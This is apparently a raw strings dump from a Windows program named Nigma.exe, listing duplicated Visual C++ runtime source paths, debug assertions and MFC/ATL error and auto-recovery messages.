f:\dd\vctools\crt_bld\self_x86\crt\src\mbsdec.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsupr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsupr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbslwr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbslwr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbscoll.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbscoll.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c

fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0

fMode == _CRTDBG_REPORT_MODE || (fMode & ~(_CRTDBG_MODE_FILE | _CRTDBG_MODE_DEBUG | _CRTDBG_MODE_WNDW)) == 0

_CrtSetReportMode

_CrtSetReportMode

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c

nRptType >= 0 && nRptType

nRptType >= 0 && nRptType

wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")

wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")

strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportA

_VCrtDbgReportA

strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")

strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")

wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportW

_VCrtDbgReportW

f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c

f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c

Wf:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp

Wf:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c

f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c

((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))

((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))

f:\dd\vctools\crt_bld\self_x86\crt\src\write.c

f:\dd\vctools\crt_bld\self_x86\crt\src\write.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftelli64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c

f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\close.c

f:\dd\vctools\crt_bld\self_x86\crt\src\close.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

jwcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)

jwcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)

wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")

wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")

wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")

wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")

_NMSG_WRITE

_NMSG_WRITE

f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c

f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\fwprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fwprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c

f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c

f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c

f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy_s.inl

ADVAPI32.DLL

ADVAPI32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricoll.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricoll.c

strcpy_s(resultstr, resultsize, autofos.man)

strcpy_s(resultstr, resultsize, autofos.man)

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strcoll.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strcoll.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c

_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2

_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2

f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c

MSPDB100.DLL

MSPDB100.DLL

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c

("CRT Logic error during setenv",0)

("CRT Logic error during setenv",0)

__crtsetenv

__crtsetenv

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp

ppCategory && pfnCrtDbgReport

ppCategory && pfnCrtDbgReport

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h

strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))

strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))

f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\open.c

0 && "Only UTF-16 little endian & UTF-8 is supported for reads"

0 && "Only UTF-16 little endian & UTF-8 is supported for reads"

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xutility

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xutility

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\deque

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\deque

std::_String_const_iterator,class std::allocator >::operator *

std::_String_const_iterator,class std::allocator >::operator *

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atltransactionmanager.h

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atltransactionmanager.h

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h

%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h

m_hKey != 0

m_hKey != 0

hKeyParent != 0

hKeyParent != 0

Assertion failed: %s, file %s, line %d

Assertion failed: %s, file %s, line %d

{8856F961-340A-11D0-A96B-00C04FD705A2}

{8856F961-340A-11D0-A96B-00C04FD705A2}

All Files (*.*)

All Files (*.*)

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

#Unable to load mail system support.

#Unable to load mail system support.

Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents

Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents

%s [Recovered]

%s [Recovered]

1.0.0.1

1.0.0.1

Nigma.exe

Nigma.exe